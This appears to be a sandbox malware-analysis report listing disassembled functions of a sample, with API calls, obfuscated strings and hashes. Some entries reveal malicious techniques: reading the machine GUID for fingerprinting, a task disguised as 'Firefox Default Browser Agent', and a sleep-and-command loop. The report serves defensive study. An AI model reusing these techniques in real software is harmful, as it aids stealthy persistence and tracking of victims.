Instruction Fuzzy Hash: 02513870D04268EFCB16DFA4D985BEDBBB0AB1430AF10855AE825BB281DB745A4CDB50

Function 00151BC0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 135COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00151CB3
task.LIBCPMTD ref: 00151CC2

Strings

wsjzsxnfmygsdnpewkoqbnspsl, xrefs: 00151C0F, 00151C6A, 00151C87
csbmzcyumqprcesgqvrbiqvieamoc, xrefs: 00151C59
$, xrefs: 00151CCF
&, xrefs: 00151CF4
), xrefs: 00151D19

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: $$&$)$csbmzcyumqprcesgqvrbiqvieamoc$wsjzsxnfmygsdnpewkoqbnspsl
API String ID: 1384045349-920653587
Opcode ID: 66ec027f29287c82f7b72fd923056d237a866100c8e58d9cddc31dfbfde0daca
Instruction ID: 0d929c341dd82598c614d8412acab438deb272b4c92dc02f0d36c767554facfc
Opcode Fuzzy Hash: 66ec027f29287c82f7b72fd923056d237a866100c8e58d9cddc31dfbfde0daca
Instruction Fuzzy Hash: C9519930D0429CDEDB16DFE8C9587EEBBB0BF11349F10425AD8266F281DBB54A89DB41

Function 00153450 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 125COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00153522
task.LIBCPMTD ref: 00153531
task.LIBCPMTD ref: 001535A3
task.LIBCPMTD ref: 001535B2

Strings

M, xrefs: 001535BF
xubyndzhfgkyolyjftysvciojnmqkiuylaiuaozgbzivnsajwdwckwqlrikkokfgwivcmckrldruifkdvqnugkamweifj, xrefs: 0015348C, 001534D9, 001534F6, 0015355A, 00153577
=, xrefs: 001535DF
0`, xrefs: 001535FB
<, xrefs: 0015353E

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: 0`$<$=$M$xubyndzhfgkyolyjftysvciojnmqkiuylaiuaozgbzivnsajwdwckwqlrikkokfgwivcmckrldruifkdvqnugkamweifj
API String ID: 1384045349-2568968963
Opcode ID: 7e1b87803a13bd3b4a0d5877e9d6c5d161d7b23027cb34641031f739aa9fb2c2
Instruction ID: 591e4dc8ff01d179bcf5a0b6fbbd58655a84db0a2f1c82b7f9759d99e5d8d1f7
Opcode Fuzzy Hash: 7e1b87803a13bd3b4a0d5877e9d6c5d161d7b23027cb34641031f739aa9fb2c2
Instruction Fuzzy Hash: 5C517770D1125CDECB05CFA8D851BAEBBB0BF15345F10825AE825BB281EB709B48CF61

Function 00152EA0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 136COMMON

Download Yara Rule

Strings

\, xrefs: 00152EFC
d, xrefs: 00152FA2
A, xrefs: 00153043
,, xrefs: 00152F21
rvqfbzqkzchslsowjgwbgixyqxqahpgvicmrxyzufifpctjqvucgyyeawwbhskxnegbgufnoibeaiqpmwd, xrefs: 00152ED2, 00152F3D, 00152F5A, 00152FBE, 00152FDB

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: ,$A$\$d$rvqfbzqkzchslsowjgwbgixyqxqahpgvicmrxyzufifpctjqvucgyyeawwbhskxnegbgufnoibeaiqpmwd
API String ID: 0-2569941080
Opcode ID: 2696d7a4ea6815090d872231019fa96fdc9ee925e6a4ca0ea73ecfa79f28ebac
Instruction ID: 404d74543ef392a1690a490d7587b47b94af1e19cb7c6079d24d2db40fec8ad5
Opcode Fuzzy Hash: 2696d7a4ea6815090d872231019fa96fdc9ee925e6a4ca0ea73ecfa79f28ebac
Instruction Fuzzy Hash: E3518970D0425CDFDB14DFA8E941BEEBBB0BF15346F10425AE825BB281DB749A48CB60

Function 00151FE0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 132COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00152065
task.LIBCPMTD ref: 00152074
task.LIBCPMTD ref: 001520E6
task.LIBCPMTD ref: 001520F5

Strings

D, xrefs: 00152081
8, xrefs: 00152102
lkyntrsqz, xrefs: 0015200E, 00152022, 0015203F, 0015209D, 001520BA, 0015211E, 0015213B

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: 8$D$lkyntrsqz
API String ID: 1384045349-148982923
Opcode ID: 74d62a1beb349bdcf0274873373a1b1f0077c31a829d812ac696718d0f5e60e9
Instruction ID: fd031e547e5907a08e19ef11f51a9a1c7cd68c7adb3c497b76e1c5ce6be192fb
Opcode Fuzzy Hash: 74d62a1beb349bdcf0274873373a1b1f0077c31a829d812ac696718d0f5e60e9
Instruction Fuzzy Hash: 94513871D05258EFCB14EBE8CC81BEEBBB0BF15305F1041AAE825BB281DB345A49DB50

Function 001530A0 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00153163
task.LIBCPMTD ref: 0015316F
task.LIBCPMTD ref: 0015317B
task.LIBCPMTD ref: 00153187
task.LIBCPMTD ref: 00153196

Strings

ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo, xrefs: 001530E3
A, xrefs: 00153137
ocibpbo, xrefs: 001530F4
qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok, xrefs: 001530D2

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: A$ocibpbo$qpbylxwxflfebdrntvmeuqlydjolllbohiwrnuuzrok$ujyqmneftulvwfljvcmwetqvlmaymtityduoubcyyomgaapgyenshgo
API String ID: 1384045349-345111150
Opcode ID: ec8bd9fc0849872e86ff56f46db7aa85ba0b6415417ece5269aeb00618a9ab1a
Instruction ID: 8350ec1d1dd05969ed5f034d23d5993f2d10f8640967eff53345a9cfe9b21370
Opcode Fuzzy Hash: ec8bd9fc0849872e86ff56f46db7aa85ba0b6415417ece5269aeb00618a9ab1a
Instruction Fuzzy Hash: 24314430C04A9CCACB05DFA4C8557ADBBB4FB25745F10825AE8327B281EBB45A88DF40

Function 01096B00 Relevance: 15.1, APIs: 12, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0109A090), ref: 01096B11
StrCmpNIA.SHLWAPI(?,?,00000000), ref: 01096B4A
LeaveCriticalSection.KERNEL32(0109A090,00000000), ref: 01096B66
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BC0
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BC7
LeaveCriticalSection.KERNEL32(0109A090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BDD
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BF7
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096BFE
LeaveCriticalSection.KERNEL32(0109A090,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096C0F
GetProcessHeap.KERNEL32(00000008,?,?), ref: 01096C1B
HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01096C22
LeaveCriticalSection.KERNEL32(0109A090), ref: 01096C33

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$CriticalSection$Leave$Process$Alloc$EnterFree
String ID:
API String ID: 2132424838-0
Opcode ID: 41258747e415305ebf4d7a0dfb4a3be852cbb093c17ce4f9987d50c4a31d62a2
Instruction ID: 16b21cff92a5b4df3ebaccd63b531dfc7c6f42db5bb8175f57b4e23705a3f789
Opcode Fuzzy Hash: 41258747e415305ebf4d7a0dfb4a3be852cbb093c17ce4f9987d50c4a31d62a2
Instruction Fuzzy Hash: 9D31ABB1700210DFEB705BA8A878F6A7BA5FBC4722F084068F6D6C7145EB3B8440D760

Function 01097180 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 120registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00000001,80000002), ref: 010971AA
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,?,00000000,?), ref: 010971C6
GetProcessHeap.KERNEL32(00000008,?), ref: 010971D9
HeapAlloc.KERNEL32(00000000), ref: 010971E0
RegQueryValueExW.ADVAPI32(80000002,MachineGuid,00000000,00000000,00000000,?), ref: 010971FD
RegCloseKey.ADVAPI32(80000002), ref: 01097209

Strings

MachineGuid, xrefs: 010971BE, 010971F5
SOFTWARE\Microsoft\Cryptography, xrefs: 010971A0

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: HeapQueryValue$AllocCloseOpenProcess
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2639912721-1211650757
Opcode ID: 344d5f9218939f7cfdc44cb214ca2ce8993ae0714dd05f6572d6b7b1f47673a6
Instruction ID: b49c2b3dc432f6a69b711ff39d0ed55685782093359a2af206a33ddf8afc32eb
Opcode Fuzzy Hash: 344d5f9218939f7cfdc44cb214ca2ce8993ae0714dd05f6572d6b7b1f47673a6
Instruction Fuzzy Hash: 9E31CF32E30215AAEF728A98C864BAABAF9FF44B10F1440D8F9D5D7155E3719540EB90

Function 01096C40 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 95memorycomCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01096C57
CoCreateInstance.OLE32(01091020,00000000,00000001,01091000,?), ref: 01096C74
SysAllocString.OLEAUT32(\Mozilla), ref: 01096CB4
SysFreeString.OLEAUT32(?), ref: 01096CEB
SysAllocString.OLEAUT32(Firefox Default Browser Agent 318146B0AF4A39CB), ref: 01096CF8
SysFreeString.OLEAUT32(00000000), ref: 01096D0F

Strings

Firefox Default Browser Agent 318146B0AF4A39CB, xrefs: 01096CF3
\Mozilla, xrefs: 01096CAF

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: String$AllocFree$CreateInitInstanceVariant
String ID: Firefox Default Browser Agent 318146B0AF4A39CB$\Mozilla
API String ID: 478541636-3211539605
Opcode ID: b2fcdaaee5c26ccf9b3799c80057de6a866de9d6d6b52bda5bc67b1b71f7e2ab
Instruction ID: 3864d4deacad71c9bdabbefef9650a8d5c500f52b0d8cae65fe8a02f443a6a17
Opcode Fuzzy Hash: b2fcdaaee5c26ccf9b3799c80057de6a866de9d6d6b52bda5bc67b1b71f7e2ab
Instruction Fuzzy Hash: 6631D770F00248AFDB109F69C898FAEBBB8FF49314F004198F985EB251D6729D84C7A0

Function 0015602B Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE

Download Yara Rule

APIs

type_info::operator==.LIBVCRUNTIME ref: 0015614A
___TypeMatch.LIBVCRUNTIME ref: 00156258
_UnwindNestedFrames.LIBCMT ref: 001563AA
CallUnexpected.LIBVCRUNTIME ref: 001563C5

Strings

csm, xrefs: 00156181
csm, xrefs: 00156068
csm, xrefs: 001560D5

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2751267872-393685449
Opcode ID: 804503d9d5a7605fc9167ba405d37da7df3fbcf8567a8a9d18fcc90bd16a855d
Instruction ID: 9d55d93ad887e03eb1136d0cb1376056c84055cf2ee4302a748f12322bf7877e
Opcode Fuzzy Hash: 804503d9d5a7605fc9167ba405d37da7df3fbcf8567a8a9d18fcc90bd16a855d
Instruction Fuzzy Hash: 7AB18A71800609EFCF15DFA4D8819AEBBB5BF24312F94415AEC256F212D730DA69CBD1

Function 00152950 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 74COMMON

Download Yara Rule

Strings

G, xrefs: 00152A10
asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj, xrefs: 001529B4
beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz, xrefs: 001529A3
uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi, xrefs: 0015297B

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: G$asvicjtdhmzqotxvozjkovueuspcnlsoajeseuzmqsvumshplyhddsgzgnwdujkffassuagpxdjjtqpfeyuvjhzapj$beaemujvpajrvbaezouuzkuenvffkjpbnnirudwjvuzqydvezlarzhdsfxwuhzojaavxqsfrojtvvhymywenjfz$uddhomtrruwqszocsssabgvinoqawnbjjydctdjlooafgswzslbhgzmrkvbotxaekjvxqqzflyruasphbtqjdnqeddrfqqgnzi
API String ID: 0-2951736196
Opcode ID: 3fa281e682f16549b839b461f8f24ea8cdf88d41cdde3cb63c1b5eaaeb1b4225
Instruction ID: 81fb2425cbc23bdf23f98f3897179cfae328dc21a879f2b2c395fcdf4373abbf
Opcode Fuzzy Hash: 3fa281e682f16549b839b461f8f24ea8cdf88d41cdde3cb63c1b5eaaeb1b4225
Instruction Fuzzy Hash: 92316971D1435CCBDB15DFA8C849BADBBB0FB16349F20025AD8256F681DBB45A88DB40

Function 01096650 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 167memorynetworkCOMMON

Download Yara Rule

APIs

InternetCrackUrlW.WININET(0109A114,00000000,00000000,0000003C), ref: 010966B5
GetProcessHeap.KERNEL32(00000008,00000001,0109A114), ref: 010966D7
HeapAlloc.KERNEL32(00000000), ref: 010966DA
GetProcessHeap.KERNEL32(00000008,00000000,00000000), ref: 01096749
HeapAlloc.KERNEL32(00000000), ref: 0109674C

Strings

<, xrefs: 0109666B

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1090000_SecuriteInfo.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess$CrackInternet
String ID: <
API String ID: 2637570027-4251816714
Opcode ID: f7bdc0c818998e19179d6bef90bea17b65e52b71f8a4e8117a8c4d64b1e6676c
Instruction ID: b3003288890278937cc51b4daa964e849ceead73ba95488100ca51b32da45f95
Opcode Fuzzy Hash: f7bdc0c818998e19179d6bef90bea17b65e52b71f8a4e8117a8c4d64b1e6676c
Instruction Fuzzy Hash: 4051AC34A002068EEF25CF6CD4A4BAEBBF5BF49314F2840ADD595DB341EA7299029B50

Function 001559A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 001559D7
___except_validate_context_record.LIBVCRUNTIME ref: 001559DF
_ValidateLocalCookies.LIBCMT ref: 00155A68
__IsNonwritableInCurrentImage.LIBCMT ref: 00155A93
_ValidateLocalCookies.LIBCMT ref: 00155AE8

Strings

csm, xrefs: 00155A7D

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 4d6b383edde591740f0e05333e4ad8c062f12b8ba6c7821c6f88b1be2aa0cb65
Instruction ID: 934d24ecc10cd7c1dd4dc588a4285daaece73c1f107282eeb8b431390704973a
Opcode Fuzzy Hash: 4d6b383edde591740f0e05333e4ad8c062f12b8ba6c7821c6f88b1be2aa0cb65
Instruction Fuzzy Hash: F641C034A00608EBCF10DF68C8D0A9EBBB2EF45325F548255EC259F392D775AA59CB90

Function 00152810 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

E, xrefs: 001528CB
V, xrefs: 00152886
vdxqujrbgdewzmu, xrefs: 00152907
-, xrefs: 001528A6

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: -$E$V$vdxqujrbgdewzmu
API String ID: 0-431869934
Opcode ID: 4143697b484c53d15f0f8cb9595e690e80b4335109ec839bbaf696a07b6bb917
Instruction ID: d78338bea4f5dfd40393a5c24a1fb7f5fae0033344eb71368044f52ddd264ef5
Opcode Fuzzy Hash: 4143697b484c53d15f0f8cb9595e690e80b4335109ec839bbaf696a07b6bb917
Instruction Fuzzy Hash: 99311A71D0464DDBDB04CFE8C9447EEBBB0FB46319F10821AD8217B280DB799A48DB95

Function 00152B80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00152C4A
task.LIBCPMTD ref: 00152C59
task.LIBCPMTD ref: 00152C96
task.LIBCPMTD ref: 00152CA5

Strings

zjhviby, xrefs: 00152BB5
pavbdksuyfvhipdpzirreavpchekomwlwyogckkwulgrtrdkljtoqeysjlgc, xrefs: 00152BC9, 00152C01, 00152C1E

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: pavbdksuyfvhipdpzirreavpchekomwlwyogckkwulgrtrdkljtoqeysjlgc$zjhviby
API String ID: 1384045349-3793283277
Opcode ID: 725e1a558d91febb7fdf6d082b281f227d23e210de228e2814445b23873e99a8
Instruction ID: 0d4b4138446d4409cb830ac8b81b4fc5f0107f2f619442bdc4b3768238f29321
Opcode Fuzzy Hash: 725e1a558d91febb7fdf6d082b281f227d23e210de228e2814445b23873e99a8
Instruction Fuzzy Hash: 59315971D0465CCECB11DFA4C851BAEBBB0FF16341F10825AE8257B281DB705A89DB50

Function 0015B35A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,001511AD,?,5D76C35C,?,0015B469,?,001593E8,00000000,001511AD), ref: 0015B41B

Strings

ext-ms-, xrefs: 0015B3C5
api-ms-, xrefs: 0015B3B1

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: b2c66c7681a4c5eda5fb992b71999dde9bc4bb70c6f7190815833436e4a11f78
Instruction ID: 435f2144588abd627810f0114658788a93dc6aaa1cc817a2f59b09b71e57f5d5
Opcode Fuzzy Hash: b2c66c7681a4c5eda5fb992b71999dde9bc4bb70c6f7190815833436e4a11f78
Instruction Fuzzy Hash: E721C372A09210EBC7319F659CC5A6E7768EB417A2B250120FD32BB291D770EE09C6E0

Function 00152AA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59COMMON

Download Yara Rule

APIs

task.LIBCPMTD ref: 00152B44
task.LIBCPMTD ref: 00152B50
task.LIBCPMTD ref: 00152B5F

Strings

cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza, xrefs: 00152AF7
avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc, xrefs: 00152AD2
tfxgtsblbgudmdxba, xrefs: 00152AE6

Memory Dump Source

Source File: 00000000.00000002.1809213854.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true

Associated: 00000000.00000002.1809177937.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809248092.0000000000163000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809275823.000000000016B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1809296320.000000000016D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_150000_SecuriteInfo.jbxd

Similarity

API ID: task
String ID: avktuarnjkmnwctvchpilxmppiyzlfbuibfddhbmaxkrelldrlrqufnncxikjppawdahzkofotemazydtnc$cfuvejvbssmjfbdrlhfalepckdilijlgikpyyremfooquqvrexiomahhenabmxgcowziwayllhzkiiwgxcakznqonwploswdmza$tfxgtsblbgudmdxba
API String ID: 1384045349-1665046790
Opcode ID: dbd8d883772c3df280538b35dcc34e26db90aa6449ead28be99ee2bcf7e6eb5d
Instruction ID: bffdf474858c878164cb653beed400ddbf58e612ac027f8d1607bdfa875e9da0
Opcode Fuzzy Hash: dbd8d883772c3df280538b35dcc34e26db90aa6449ead28be99ee2bcf7e6eb5d
Instruction Fuzzy Hash: FE21653090435CDBCB04DFA4CC55BEDBBB0FB15708F10062AE8266F281DB745A48CB50

Function 010984D4 Relevance: 9.1, APIs: 6, Instructions: 81sleepstringthreadCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 01098166
lstrcmpA.KERNEL32(00000000,INIT), ref: 01098173
StrToIntA.SHLWAPI(00000000), ref: 01098236
GetTickCount64.KERNEL32 ref: 0109863B

Part of subcall function 01095740: GetProcessHeap.KERNEL32(00000008,00000001,010981FE,00000001,00000000), ref: 01095743
Part of subcall function 01095740: HeapAlloc.KERNEL32(00000000), ref: 0109574A

StrToIntA.SHLWAPI(00000000), ref: 01098534
StrToIntA.SHLWAPI(?), ref: 0109853D
CreateThread.KERNEL32(00000000,00000000,Function_00007550,00000000,00000000,00000000), ref: 01098551
CloseHandle.KERNEL32(00000000), ref: 0109855C

Part of subcall function 01095760: GetProcessHeap.KERNEL32(00000000,00000000,01098685), ref: 01095767
Part of subcall function 01095760: HeapFree.KERNEL32(00000000), ref: 0109576E

Sleep.KERNEL32(00000000), ref: 01098696

Memory Dump Source

Source File: 00000000.00000002.1809524488.0000000001091000.00000020.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true

Associated: 00000000.00000002.1809497333.0000000001090000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1809558628.000000000109B000.00000002.00001000.00020000.00000000.sdmpDownload File

